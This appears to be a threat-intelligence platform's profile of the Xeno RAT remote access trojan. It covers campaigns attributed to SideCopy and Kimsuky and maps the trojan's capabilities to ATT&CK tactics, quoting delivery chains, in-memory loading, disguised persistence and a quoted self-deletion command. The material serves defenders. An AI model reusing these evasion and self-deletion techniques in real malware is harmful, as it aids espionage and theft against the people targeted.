Xeno RAT
Xeno RAT is an open-source Windows remote access trojan written in C# and publicly available on GitHub. It is described as compatible with Windows 10 and Windows 11 and includes a builder for creating customized variants. Reported capabilities include remote command execution, data exfiltration/theft, file operations, loading and executing external DLL modules, keystroke logging, screenshot capture, clipboard monitoring, webcam and microphone access including live audio recording, antivirus information retrieval, SOCKS5 reverse proxy/network tunneling, hVNC hidden desktop functionality, persistence creation including scheduled tasks, and self-removal/uninstall features.
The malware has been observed in multiple intrusion sets and delivery chains. Seqrite reported a spear-phishing campaign dubbed Operation XENOFISCAL, likely conducted by the Pakistan-aligned SideCopy group (associated with Transparent Tribe/APT36), targeting Afghanistan’s Ministry of Finance and provincial finance/revenue entities. In that activity, phishing emails delivered ZIP archives containing Pashto-language malicious LNK files disguised as PDFs; execution invoked mshta.exe to fetch an HTA payload from a compromised Afghan domain, execute obfuscated JavaScript, establish registry persistence masquerading as Microsoft Edge, and deploy Xeno RAT 1.8.7 via a DLL loader alongside a decoy document. Seqrite described the campaign sample as a customized Xeno RAT with a hardcoded C2 domain hosted by a bulletproof provider in Bulgaria.
Xeno RAT has also been linked in reporting on DPRK-related activity. Fortinet noted earlier iterations of a Kimsuky-attributed campaign used LNK files and GitHub-based command-and-control to distribute Xeno RAT and its variant MoonPeak, consistent with prior ENKI and Trellix reporting. Separate reporting described Kimsuky targeting diplomatic missions in South Korea using phishing emails with ZIP/LNK payloads, GitHub for covert C2, and cloud services such as Dropbox and Daum Cloud to deliver the Xeno RAT variant MoonPeak.
Other observed delivery mechanisms include Discord CDN distribution via a shortcut file disguised as a WhatsApp screenshot that downloads a ZIP archive and proceeds through a multi-stage infection chain using DLL side-loading, persistence, and anti-analysis/anti-detection measures. Securonix also reported Xeno RAT as one of several payloads in the VOID#GEIST campaign, where phishing-delivered batch scripts fetched staged payloads from TryCloudflare infrastructure; a Python loader and the legitimate Microsoft binary AppInstallerPythonRedirector.exe were used to decrypt and launch Xeno RAT, with in-memory execution via injection into explorer.exe. Proofpoint additionally listed Xeno RAT among payloads historically used by the initial access broker TA584.
Cybereason highlighted Xeno RAT’s built-in hVNC capability as a standard feature and observed in testing that attackers could launch hidden Chrome and PowerShell sessions invisible to the victim, with a second explorer.exe associated with the hidden desktop. High-confidence associations in the provided content therefore include use by SideCopy against Afghan government finance targets, prior use/distribution in Kimsuky-linked GitHub-C2 activity, and broader use as a commodity/open-source RAT in phishing-led campaigns.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The malware these steps were in service of, Xeno RAT, is an open source (OSS) remote stealer, customized in this case with a hardcoded command-and-control (C2) domain hosted by a bulletproof service in Bulgaria.
The malware these steps were in service of, Xeno RAT, is an open source (OSS) remote stealer, customized in this case with a hardcoded command-and-control (C2) domain hosted by a bulletproof service in Bulgaria.
The malware these steps were in service of, Xeno RAT, is an open source (OSS) remote stealer, customized in this case with a hardcoded command-and-control (C2) domain hosted by a bulletproof service in Bulgaria.
Fortinet notes that earlier iterations of this activity delivered the Xeno RAT malware family. Similar GitHub-based C2 usage for distributing Xeno RAT and its variant MoonPeak was previously reported by ENKI and Trellix, both attributing the activity to Kimsuky.
Proofpoint says TA584 has used a large number of payloads over the years, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniquethe attackers hosted their remote payload on a compromised domain in the IP address space of Afghanistan's Ministry of Communication and Information Technology.
Initial Access
1 techniqueThe attacks began with spear-phishing emails. Those emails contained zip archives, with malicious LNK files disguised as PDFs.
Execution
6 techniquesThe malware is equipped to ... launch the malware via a scheduled task ...
Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
The RunProcessWithHiddenCmd() function is used to execute files or commands through cmd.exe.
Upon execution, the LNK file uses mshta.exe to download a remote HTML Application (HTA) from a compromised Afghan education domain, leading to the execution of obfuscated JavaScript.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... transfers execution to the injected buffer through the CreateThread() API.
Those emails contained zip archives, with malicious LNK files disguised as PDFs.
Persistence
2 techniquesThe malware is equipped to ... launch the malware via a scheduled task ...
Privilege Escalation
3 techniquesThe malware is equipped to ... launch the malware via a scheduled task ...
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
Stealth
7 techniquesThis staged approach is commonly used in fileless malware... reconstruct the serialized payload entirely in memory without touching disk.
A couple of loaders followed, and the attackers established persistence via the Windows registry, disguising their task as a Microsoft Edge process.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
It launches a hidden cmd.exe process with a Base64-decoded command (/C choice /C Y /N /D Y /T 3 & Del) that waits for a few seconds and then deletes the running executable file from disk.
The LNK files used mshta to fetch an HTA payload, which then got decoded in-memory.
The malware creates a directory named USOShared-1de48789-1285 under C:\Users\Public\ to store the next-stage HTA payload... The directory naming convention mimics application-generated cache or profile folders.
The embedded payload is then decrypted and loaded directly from memory using reflective techniques such as Assembly.Load(byte[]) , avoiding disk-based deployment entirely.
Credential Access
1 techniqueDiscovery
2 techniquesThe script then checks whether the .NET Framework version v4.0.30319 is installed by querying the registry path HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319.
GetAntivirus function retrieves antivirus information from the system using Windows Management Instrumentation (WMI) by querying the AntivirusProduct class under root\SecurityCenter2.
Collection
5 techniquesXeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
The malware is equipped to ... monitor the clipboard ...
The malware is equipped to ... track webcam/microphone ...
The malware is equipped to ... track webcam/microphone ...
Command and Control
6 techniquesXeno RAT, is an open source (OSS) remote stealer, customized in this case with a hardcoded command-and-control (C2) domain hosted by a bulletproof service in Bulgaria.
the LNK silently leverages mshta.exe to fetch a remote HTA payload from a compromised Afghan education domain... hosted over HTTPS.
Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
The malware is equipped to ... support SOCKS5 proxy-based network tunneling ...
data security is enforced using AES encryption, where raw data is encrypted with a shared key and fixed IV via CryptoStream, ensuring secure communication during transmission.
By running their malicious traffic through the government's own sovereign infrastructure, on a website situated next to more than 200 legitimate government and education sites, the hackers were able to blend their malicious traffic with proper state business.
Other
1 techniqueIOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Other indicator types observed in public reporting.
Recent activity
21 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source remote access trojan and stealer used in this campaign for espionage, customized with a hardcoded C2 domain.
Related:Pakistan Spies on Afghan Finance Ministry With Xeno RAT
Open-source remote access trojan used in a spear-phishing campaign. It enables remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
An open-source remote access trojan used in spear-phishing campaigns. In this campaign it was dropped via a DLL-based loader and established registry-based persistence while enabling remote command handling, DLL module execution, scheduled task launch, antivirus discovery, SOCKS5 tunneling, file operations, keylogging, screenshots, clipboard monitoring, webcam/microphone tracking, persistence removal, and self-uninstall.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.